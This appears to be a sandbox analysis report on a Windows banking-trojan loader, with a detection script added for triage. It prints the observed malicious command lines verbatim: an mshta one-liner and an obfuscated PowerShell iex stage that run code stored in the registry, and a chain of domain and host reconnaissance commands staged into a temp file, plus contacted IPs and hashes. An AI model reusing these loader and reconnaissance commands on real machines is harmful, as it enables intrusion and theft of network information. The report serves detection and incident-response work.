| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege; LUID not resolved to a name by the sandbox) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege; LUID not resolved to a name by the sandbox) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"
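Added triage example (Python written for this page; it is not part of the sandbox report or of any vendor tooling). It runs over constructed process-creation records that carry the command lines from the process tree above and flags the stages of the chain: mshta executing an inline HTA that reads script text out of the registry, PowerShell aliasing `iex` and `gp` to run a registry value, the `cmd /C pause dll mail` invocation, and the run of recon tools all redirected into one temp file. It also extracts the registry key and value names the mshta and PowerShell stages read from (the GUID-named key under HKCU\Software\AppDataLow\Software\Microsoft, which is what a responder should export from the user's hive), and sorts registry writes of the two kinds seen on this page: the RuntimeBroker rows under "Modifies registry class" are ordinary ContentDeliveryManager bookkeeping, not part of the infection. The log format, PIDs, the rule threshold and the benign last log line are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample of process-creation log lines ("pid|image|command line").
# The command lines are copied from this report's process tree; the PIDs, the
# one-line log format and the benign last line are assumptions made for the example.
SAMPLE_LOG = r"""
101|C:\Windows\SysWOW64\regsvr32.exe|/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
102|C:\Windows\System32\mshta.exe|"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
103|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
104|C:\Windows\syswow64\cmd.exe|"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
105|C:\Windows\system32\cmd.exe|cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
106|C:\Windows\system32\cmd.exe|cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
107|C:\Windows\system32\cmd.exe|cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
108|C:\Windows\system32\cmd.exe|cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
109|C:\Windows\system32\cmd.exe|cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
110|C:\Windows\system32\cmd.exe|cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
111|C:\Windows\system32\cmd.exe|cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"
112|C:\Windows\system32\cmd.exe|cmd /C "echo hello > C:\Users\Admin\Desktop\notes.txt"
"""

# Recon tools the chain above runs; a command line is attributed to the first prefix it matches.
RECON_TOOLS = ("systeminfo", "net view", "net config", "nslookup", "tasklist",
               "driverquery", "reg.exe query", "nltest", "wmic computersystem")
RECON_THRESHOLD = 4          # distinct recon tools writing to one file (assumed cut-off)

HTA_FROM_REGISTRY = re.compile(r"about:<hta:application>.*\bregread\(", re.I | re.S)
ALIASED_IEX = re.compile(r"new-alias\s+-name\s+\S+\s+-value\s+(?:iex|invoke-expression)\b", re.I)
PAUSE_DLL_MAIL = re.compile(r"/C\s+pause\s+dll\s+mail\b", re.I)
# tool text before the first > or >>, then the output path up to a quote, & or |
REDIRECT_TO_FILE = re.compile(r'"\s*(?P<tool>.+?)\s*>{1,2}\s*(?P<out>[^"&|]+)')
GUID = r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}"
# \\+ tolerates the doubled/tripled backslashes inside the HTA's JScript string
ISFB_STORE_KEY = re.compile(r"AppDataLow\\+Software\\+Microsoft\\+(?P<guid>" + GUID + ")", re.I)
ISFB_STORE_REF = re.compile(ISFB_STORE_KEY.pattern + r'(?:\\+|"\)\.)(?P<value>\w+)', re.I)
APPMODEL_NOISE = re.compile(r"\\AppModel\\SystemAppData\\Microsoft\.Windows\.ContentDeliveryManager_", re.I)


def parse_log(text):
    """Turn the constructed 'pid|image|command line' lines into event dicts."""
    events = []
    for line in text.strip().splitlines():
        pid, image, cmd = line.split("|", 2)      # maxsplit keeps pipes inside the command line
        events.append({"pid": int(pid), "image": image, "cmdline": cmd})
    return events


def triage(events):
    """Apply the four rules and return one finding dict per hit."""
    findings = []
    staged = defaultdict(dict)                    # output file -> {recon tool: pid}
    for ev in events:
        image, cmd, pid = ev["image"].lower(), ev["cmdline"], ev["pid"]
        if image.endswith("mshta.exe") and HTA_FROM_REGISTRY.search(cmd):
            findings.append({"rule": "mshta_inline_hta_regread", "pids": [pid], "detail": cmd[:80]})
        elif image.endswith("powershell.exe") and ALIASED_IEX.search(cmd):
            findings.append({"rule": "powershell_aliased_iex", "pids": [pid], "detail": cmd[:80]})
        elif image.endswith("cmd.exe"):
            if PAUSE_DLL_MAIL.search(cmd):
                findings.append({"rule": "cmd_pause_dll_mail", "pids": [pid], "detail": cmd[:80]})
            m = REDIRECT_TO_FILE.search(cmd)
            if m:
                tool = m.group("tool").strip().lower()
                for key in RECON_TOOLS:
                    if tool.startswith(key):
                        staged[m.group("out").strip().lower()][key] = pid
                        break
    for out, tools in staged.items():             # one finding per staging file, not per command
        if len(tools) >= RECON_THRESHOLD:
            findings.append({"rule": "recon_staged_to_file", "pids": sorted(set(tools.values())),
                             "detail": out, "tools": sorted(tools)})
    return findings


def registry_store(events):
    """(GUID, value name) pairs the loader stages read their code from."""
    refs = set()
    for ev in events:
        for m in ISFB_STORE_REF.finditer(ev["cmdline"]):
            refs.add((m.group("guid").upper(), m.group("value")))
    return sorted(refs)


def classify_registry_path(path):
    """Sort a registry write: ContentDeliveryManager rows are Windows bookkeeping,
    a GUID-named key under the per-user AppDataLow branch is the bot's store."""
    if APPMODEL_NOISE.search(path):
        return "windows_appmodel_noise"
    if ISFB_STORE_KEY.search(path):
        return "isfb_registry_store"
    return "unclassified"


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for f in triage(evs):
        print(f["rule"], f["pids"], f["detail"])
    print(registry_store(evs))
```

The staging rule keys on the output file rather than on any single command, because each `cmd /C "<tool> >> file"` is an unremarkable process on its own; the signal is several discovery tools appending to the same temp file within one run.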
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| IE | 13.69.239.72:443 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 209.197.3.8:80 | | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/1816-130-0x0000000000000000-mapping.dmp
memory/1816-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1816-136-0x0000000000CD0000-0x0000000000CDD000-memory.dmp
memory/3932-140-0x0000000000000000-mapping.dmp
memory/3932-141-0x000001CF6D940000-0x000001CF6D962000-memory.dmp
memory/3932-142-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp
memory/516-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline
| MD5 | f2734214002408a7eccd2fbae5870da5 |
| SHA1 | fde6d5c4e61dff27f46f69c480155e1101397700 |
| SHA256 | 552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102 |
| SHA512 | 3e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5 |
\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/2720-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP
| MD5 | e250c595c30addb02ffc6984e63a7380 |
| SHA1 | b44e41b7d62b61f9b04eed3e311910f34a0ebedb |
| SHA256 | 15f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063 |
| SHA512 | 8abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6 |
C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp
| MD5 | a9eead4a76288738990c8668032dd780 |
| SHA1 | ece0771b0b40abec808cd5e8dedfbebbd4345d68 |
| SHA256 | 925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc |
| SHA512 | b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb |
C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll
| MD5 | 8495c9cbe1593820014899a043577e1b |
| SHA1 | b395a19a3262dc61ea9f3174cad05e194fcbbe57 |
| SHA256 | 08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8 |
| SHA512 | 035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715 |
memory/696-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline
| MD5 | 340f65806e42a1b022861685812d236b |
| SHA1 | a53ffde123a1837fe255d764e7a992ab905fb8b9 |
| SHA256 | b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7 |
| SHA512 | 30b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb |
\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/1932-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP
| MD5 | 83ab673e353bc97b876da6cfc8b171d8 |
| SHA1 | 4a661313af68b943f2580cdbcf76b19a89e12734 |
| SHA256 | 2a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e |
| SHA512 | a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93 |
C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp
| MD5 | 860be3be01f3f3c1bb8223c4b4ebf8d5 |
| SHA1 | 98662fcdbf155d942f6aec76e367f0fef5cb1f21 |
| SHA256 | 51f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54 |
| SHA512 | 63f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b |
C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.dll
| MD5 | ea0f2464b104a78625ed3074b10d5b26 |
| SHA1 | 871ebae4ea06340b952d4671f6cf79013808bf22 |
| SHA256 | 4823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506 |
| SHA512 | 82fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10 |
memory/3932-157-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp
memory/3932-158-0x000001CF6F4E0000-0x000001CF6F51D000-memory.dmp
memory/3448-159-0x000001E7C59B0000-0x000001E7C5A53000-memory.dmp
memory/3020-160-0x0000000007E40000-0x0000000007EE3000-memory.dmp
memory/2616-162-0x0000000000000000-mapping.dmp
memory/1860-161-0x0000000000000000-mapping.dmp
memory/3656-163-0x0000000000000000-mapping.dmp
memory/1344-164-0x0000000000000000-mapping.dmp
memory/3720-165-0x0000019D12F00000-0x0000019D12FA3000-memory.dmp
memory/2616-166-0x00000000005A6B20-0x00000000005A6B24-memory.dmp
memory/4104-167-0x00000204A5A10000-0x00000204A5AB3000-memory.dmp
memory/536-168-0x00000223FA1E0000-0x00000223FA283000-memory.dmp
memory/3020-169-0x000000000B160000-0x000000000B29B000-memory.dmp
memory/2616-170-0x0000000000A70000-0x0000000000B06000-memory.dmp
memory/5028-174-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/2876-176-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/4020-178-0x0000000000000000-mapping.dmp
memory/3020-179-0x00000000084A0000-0x00000000085DA000-memory.dmp
memory/3936-183-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 42bfa4737502d07aa54f4c8ee04c5fef |
| SHA1 | 7198ae79a9c046de5d684acfd132b37f00f6a425 |
| SHA256 | 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36 |
| SHA512 | 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d |
memory/4668-185-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 42bfa4737502d07aa54f4c8ee04c5fef |
| SHA1 | 7198ae79a9c046de5d684acfd132b37f00f6a425 |
| SHA256 | 3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36 |
| SHA512 | 5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d |
memory/1160-187-0x0000000000000000-mapping.dmp
memory/3020-188-0x0000000007E40000-0x0000000007EE3000-memory.dmp
memory/4240-189-0x0000000000000000-mapping.dmp
memory/4452-190-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f2ea599a2b3969ca84eef5bfcb3872f5 |
